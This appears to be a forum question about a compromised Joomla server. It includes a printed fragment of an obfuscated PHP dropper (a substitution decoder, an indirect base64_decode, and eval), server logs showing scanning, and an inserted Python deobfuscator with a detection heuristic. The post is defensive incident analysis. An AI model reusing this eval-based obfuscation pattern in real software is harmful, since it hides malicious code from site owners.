My server has a hole somewhere and I need some help plugging it. PHP files containing base64-encoded code keep appearing on my Joomla site.
I was first blacklisted (Kelihos was listed as the reason) and found that I had many PHP files with random but human-looking names (login.php, file.php, alias75.php ...) in the Joomla directory. All the files have the main part of the script behind a base64_decode function. Here is an example from a listing of such files:
-rw-r--r-- 1 www-data www-data 155232 Dec 24 18:51 file.php
Note the date & time. The night before Christmas. It is always the same - the files appear at 6 in the morning, with dates starting from December 24th. Could this be a clue? Here is a snippet of the actual code:
<?php
function jqgwuawwjs($rlkr, $fikixpq){$wynuczq = ''; for($i=0; $i < strlen($rlkr); $i++){$wynuczq .= isset($fikixpq[$rlkr[$i]]) ? $fikixpq[$rlkr[$i]] : $rlkr[$i];}
$jeb="base64_decode";return $jeb($wynuczq);}
$ldo = 'dGCoZSRV5id3buS9XQR9iuMT59Xg1zcSKz0Ok0OUZYcOipECsx'.
'aDIGRDiuS9XQR9X9Xg1PUOk0OUZYcOipECsxaDIYFHiuSH5YE2sGCTICR6ZY2Cb90ayxqmxq7V5iWv'.
followed by another 1900 lines like that, and ending with:
end;
$zmdjyoxo = Array('1'=>'I', '0'=>'w', '3'=>'o', '2'=>'1', '5'=>'Z', '4'=>'q', '7'=>'B', '6'=>'0', '9'=>'y', '8'=>'6', 'A'=>'K', 'C'=>'l', 'B'=>'i', 'E'=>'N', 'D'=>'n', 'G'=>'G', 'F'=>'F', 'I'=>'b', 'H'=>'4', 'K'=>'T', 'J'=>'8', 'M'=>'x', 'L'=>'L', 'O'=>'p', 'N'=>'P', 'Q'=>'m', 'P'=>'D', 'S'=>'V', 'R'=>'9', 'U'=>'A', 'T'=>'v', 'W'=>'R', 'V'=>'z', 'Y'=>'W', 'X'=>'c', 'Z'=>'a', 'a'=>'g', 'c'=>'5', 'b'=>'J', 'e'=>'t', 'd'=>'Q', 'g'=>'s', 'f'=>'j', 'i'=>'X', 'h'=>'U', 'k'=>'O', 'j'=>'r', 'm'=>'7', 'l'=>'e', 'o'=>'u', 'n'=>'h', 'q'=>'k', 'p'=>'3', 's'=>'d', 'r'=>'Y', 'u'=>'2', 't'=>'S', 'w'=>'H', 'v'=>'f', 'y'=>'M', 'x'=>'C', 'z'=>'E');
eval(jqgwuawwjs($ldo, $zmdjyoxo));?>
When you change eval to print, this is what comes out (the code is too big for the message body - here is a link to pastebin):
I deleted all these files from the server, changed the root password, the MySQL password and the Joomla password, and activated two-factor authentication for the Joomla administrator.
I noticed strange behaviour a month ago, but before I could investigate the problem (possibly related to this) my provider, Host9, had a catastrophic failure. That left me without a website & mail server from December 15th to December 12th (!). Since then I have had a cron job that looks for these PHP files. Of course, deleting them only solves half the problem. The question is: how do these files keep appearing?
I have a VPS:
Ubuntu Server, Linux 3.13.0-63-generic on x86_64
Apache/2.4.7
PHP 5.5.9
Joomla 3.4.8
The file appears after 6 in the morning, so I have included the apache2 access.log from around that time:
61.135.190.71 - - [27/Jan/2016:22:56:31 +0000] "GET / HTTP/1.0" 200 430 "http://www.baidu.com/s?wd=www" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
208.52.154.243 - - [28/Jan/2016:01:23:44 +0000] "GET /dbadmin/scripts/setup.php HTTP/1.0" 404 458 "-" "-"
::1 - - [28/Jan/2016:02:56:54 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:56 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:43:36 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:56:03 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:11:58 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:20 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:21 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:34 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:23 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:24 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:26 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:31 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:32 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:29:28 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
78.155.39.214 - - [28/Jan/2016:07:47:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 3570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/js/messages.php?lang=en&db=&token=79eab716479466d5c44116323db94bb0 HTTP/1.1" 200 17157 "http://207.210.201.88/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/phpmyadmin.css.php?server=1&token=79eab716479466d5c44116323db94bb0&nocache=4147360344ltr HTTP/1.1" 200 17556 "http://my.ip.add.ress/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
::1 - - [28/Jan/2016:08:03:53 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:57 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:01 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:17 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:18 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
Apache2 error.log
[Mon Jan 25 03:30:13.688765 2016] [:error] [pid 25830] [client 95.213.177.123:41264] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 03:49:23.091859 2016] [:error] [pid 4517] [client 208.52.154.243:37227] script '/var/www/moadmin.php' not found or unable to stat
[Mon Jan 25 07:40:45.016456 2016] [:error] [pid 19847] [client 95.213.177.124:38892] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 23:50:34.056409 2016] [:error] [pid 2434] [client 185.25.151.159:34885] script '/var/www/testproxy.php' not found or unable to stat
[Tue Jan 26 06:47:48.641496 2016] [:error] [pid 6043] [client 95.213.177.122:42690] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 10:58:48.569545 2016] [:error] [pid 14076] [client 95.213.177.123:32251] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 15:06:42.084295 2016] [core:error] [pid 25454] [client 169.229.3.91:42376] AH00135: Invalid method in request c'\xfdF\x9c\xd8\x02\xb9N\xfa\x8d\xc6J(\x9c\xb0\x04\xa3%
[Thu Jan 28 08:01:43.830310 2016] [mpm_prefork:notice] [pid 3932] AH00169: caught SIGTERM, shutting down
[Thu Jan 28 08:01:44.884060 2016] [mpm_prefork:notice] [pid 26468] AH00163: Apache/2.4.7 (Ubuntu) configured -- resuming normal operations
[Thu Jan 28 08:01:44.884678 2016] [core:notice] [pid 26468] AH00094: Command line: '/usr/sbin/apache2'
[Thu Jan 28 08:21:31.499215 2016] [:error] [pid 26475] [client 78.155.39.214:50308] script '/var/www/phpmyadmin.css.php' not found or unable to stat
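As an added example (not code from the question or the answer): a Python port of the decoder jqgwuawwjs(), fed the $zmdjyoxo table and the first $ldo fragment exactly as posted above, so the "change eval to print" step can be done offline without ever executing the file. The obfuscate() helper, the sample payload and the looks_like_eval_dropper() heuristic for the cleanup cron job are constructed for this demonstration.

```python
import base64
import re

# Substitution table and first string fragment, copied verbatim from the question.
PHP_MAP_LITERAL = "Array('1'=>'I', '0'=>'w', '3'=>'o', '2'=>'1', '5'=>'Z', '4'=>'q', '7'=>'B', '6'=>'0', '9'=>'y', '8'=>'6', 'A'=>'K', 'C'=>'l', 'B'=>'i', 'E'=>'N', 'D'=>'n', 'G'=>'G', 'F'=>'F', 'I'=>'b', 'H'=>'4', 'K'=>'T', 'J'=>'8', 'M'=>'x', 'L'=>'L', 'O'=>'p', 'N'=>'P', 'Q'=>'m', 'P'=>'D', 'S'=>'V', 'R'=>'9', 'U'=>'A', 'T'=>'v', 'W'=>'R', 'V'=>'z', 'Y'=>'W', 'X'=>'c', 'Z'=>'a', 'a'=>'g', 'c'=>'5', 'b'=>'J', 'e'=>'t', 'd'=>'Q', 'g'=>'s', 'f'=>'j', 'i'=>'X', 'h'=>'U', 'k'=>'O', 'j'=>'r', 'm'=>'7', 'l'=>'e', 'o'=>'u', 'n'=>'h', 'q'=>'k', 'p'=>'3', 's'=>'d', 'r'=>'Y', 'u'=>'2', 't'=>'S', 'w'=>'H', 'v'=>'f', 'y'=>'M', 'x'=>'C', 'z'=>'E')"
LDO_FRAGMENT = "dGCoZSRV5id3buS9XQR9iuMT59Xg1zcSKz0Ok0OUZYcOipECsx"


def parse_php_map(literal: str) -> dict:
    """Pull the PHP Array('k'=>'v', ...) literal out of the file into a dict."""
    return dict(re.findall(r"'(.)'=>'(.)'", literal))


def deobfuscate(encoded: str, table: dict) -> str:
    """Port of jqgwuawwjs(): map every character through the table (characters
    not in it, i.e. '+', '/', '=', pass through unchanged), then base64-decode.
    Padding is restored so a truncated fragment still decodes."""
    substituted = "".join(table.get(ch, ch) for ch in encoded)
    substituted += "=" * (-len(substituted) % 4)
    return base64.b64decode(substituted).decode("utf-8", errors="replace")


def obfuscate(plaintext: str, table: dict) -> str:
    """Inverse of deobfuscate(). The table is a permutation of [0-9A-Za-z], so
    inverting it is well defined. Constructed helper, used to build a test sample."""
    inverse = {v: k for k, v in table.items()}
    b64 = base64.b64encode(plaintext.encode()).decode()
    return "".join(inverse.get(ch, ch) for ch in b64)


def looks_like_eval_dropper(source: str) -> bool:
    """Constructed heuristic for the cron job: eval() is present and
    base64_decode is named only as a string assigned to a variable, the
    indirect call this sample uses, which a grep for base64_decode( misses."""
    indirect = re.search(r'\$\w+\s*=\s*["\']base64_decode["\']\s*;', source)
    return bool(indirect) and "eval(" in source


if __name__ == "__main__":
    table = parse_php_map(PHP_MAP_LITERAL)
    print(deobfuscate(LDO_FRAGMENT, table))  # first statement of the hidden payload
    sample = obfuscate('echo "constructed sample";', table)
    print(sample, "->", deobfuscate(sample, table))
```

The posted fragment decodes to a call that silences PHP's error_log, which is why nothing about these files shows up in the server's own error logging.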
Answer 0 (score: 1)
The code looks like a malware script, and it has been encoded to protect it. I suggest you remove it with a program.
Try Narnia Guardian, http://github.com/Pilskalns/Narnia-Guardian
Try using the above resource to remove these encoded snippets from all your files. It is easy to set up and easy to use. All you need is to be patient.